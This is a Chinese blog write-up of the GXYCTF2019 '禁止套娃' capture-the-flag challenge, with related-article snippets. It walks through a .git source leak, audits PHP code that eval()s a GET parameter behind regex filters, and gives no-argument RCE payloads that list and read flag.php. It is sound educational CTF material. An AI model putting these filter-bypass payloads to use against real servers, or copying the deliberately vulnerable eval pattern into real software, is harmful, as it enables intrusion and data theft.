[GXYCTF2019]禁止套娃(每日一题)

最新推荐文章于 2024-02-05 10:47:22 发布
最新推荐文章于 2024-02-05 10:47:22 发布
阅读量581 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51684648/article/details/120133848
版权

[GXYCTF2019]禁止套娃

知识点

  • .git源码泄露
  • 无参数RCE,参考文章:https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#

解题思路

1.打开题目,啥也没有,F12也啥都没有,用wscan扫一下目录看看,发现.git返回403,猜测是git源码泄露。

image-20210905211631569

2.使用GitHack下载源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xecnj2F2-1630909930492)(https://i.loli.net/2021/09/05/NrFM3Sc71i25enO.png)]

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

3.分析代码:

1,需要以GET形式传入一个exp参数,如果满足条件,会执行这个参数的内容;
2,过滤了几个常用的伪协议;
3,(?R)?重复引用当前表达式(递归调用),所以只能无参数绕过;
4,过滤了一些关键字,限制一些函数的使用;

4.首先查看当前目录下的文件。

payload:?exp=print_r(scandir(current(localeconv())));

localconv():函数返回一包含本地数字及货币格式信息的数组,数组第一项是.
current()/pos():函数返回数组中的当前元素,初始指向第一个元素。
所以current(localeconv())=='.'  (永远是点)
scandir('.'):列出当前目录中的文件和目录。

image-20210906141315774

5.接下来要读取flag.php文件中的内容。

payload:?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

array_reverse():将原数组中的元素顺序反转,创建新的数组并返回。
next():函数将内部指针指向数组的下一个元素,并输出。
YI_an#
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3469
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
Imaginary CTF 2022 真题
08-01
"Imaginary CTF 2022 真题"是网络安全竞赛中的一种挑战集,这类活动通常由各种组织举办,旨在检验参赛者在逆向工程、取证分析、网络攻防、密码学以及杂项技能等多个IT领域的知识和能力。 Imaginary CTF 平台...
ctfshow web入门之命令执行
uuzfumo的博客
12-17 1078
命令执行姿势
[GXYCTF2019]禁止套娃1 不会编程的崽的博客
不会编程的崽的博客
02-05 1247
ctf 源码泄露 无参数rce
[GXYCTF2019]禁止套娃1 writeup
m0_65080524的博客
08-14 190
preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) : 对输入参数exp做了过滤,把data、filter、php,phar等等php伪协议,别看好像很多\和/ 其实原型是data:// 然后利用\ 去转义/ 所以就变成data:\ /\ /preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) 过滤了很多敏感文件的关键字。
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
中兴预赛试题 俄罗斯套娃奖品程序
06-27
你可以沿着道路飞奔,拾取路口的娃娃,要求是任何时刻必须是一个套娃,装好后就不能再拆开了。注意不要走重复路。” 请你为伊万洛夫规划路线,使得他能够有最大的收获。 Input: cross.txt 输入包括多组测试用例; ...
Scratch图形化编程题:套娃生产机 根据输入的套娃层数,自动生产出套娃产品
最新发布
05-27
Scratch图形化编程题:套娃生产机。 根据输入的套娃层数,自动生产出套娃产品。
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃信封问题(一维升序 二维降序)1
08-03
标题中的“俄罗斯套娃信封问题(一维升序 二维降序)1”是指一个经典的计算机科学问题,它在算法设计和优化领域有广泛的应用。这个问题的核心是找到一种方式来组织一组信封,使得一个信封可以完全放入另一个信封内,...
[GXYCTF2019]禁止套娃 1
Kradress的博客
12-10 209
目录源码思路题解 源码 扫到 .git <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['
[GXYCTF2019]禁止套娃-无参数rce详细分析(代码审计三)
qq_50589021的博客
06-02 290
[GXYCTF2019]禁止套娃 做这个题的时候是不知道禁止套娃是什么意思的,等完全理解((?R)?\)\)了这个正则匹配表达式以后就可以明白,所谓的套娃就是什么 考点: 无参数rce 信息泄露 利用dirsearch开延时,会扫出来.git相关的泄露,利用githack将源码down下来 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\
[GXYCTF2019]禁止套娃(特详解)
热门推荐
qq_74806534的博客
01-29 2万+
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。一个合法的表达式也可以是a(b();
[GXYCTF2019]禁止套娃
weixin_45751765的博客
11-25 389
0x00 前言 写这篇主要巩固一下正则,难度不是特别大 递归正则属于是盲区了 0x01 Sunwear 看看页面空空如也,抓包看看也是空空如也 果断扫一下 Githack一把梭 拿到index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET
buuctf-[GXYCTF2019]禁止套娃(小宇特详解)
小宇的web博客
02-12 1189
buuctf-[GXYCTF2019]禁止套娃(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
命令注入ctfshow
yaoge1225的博客
07-20 417
title: CTFshow命令注入 date: 2021-07-15 tags: [ctf] description: 刷题记录 搜索引擎http://helosec.com/ 正则解释https://regexper.com/ web31 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/.
无参数读文件和RCE总结
蚁景网安学院
07-06 2755
引言代码解析无参数任意文件读取查看当前目录文件名读取当前目录文件查看上一级目录文件名读取上级目录文件查看和读取多层上级路径的就不写了,一样的方式套娃就行查看和读取根目录文件无参数命令执行...
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1727
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
用java获取一个无限套娃字典的键值
04-05
无限套娃字典的键值是一个递归的数据结构,可以使用Java中的Map来实现。以下是一个示例代码,使用Map来表示一个无限套娃字典: ``` import java.util.HashMap; import java.util.Map; public class ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值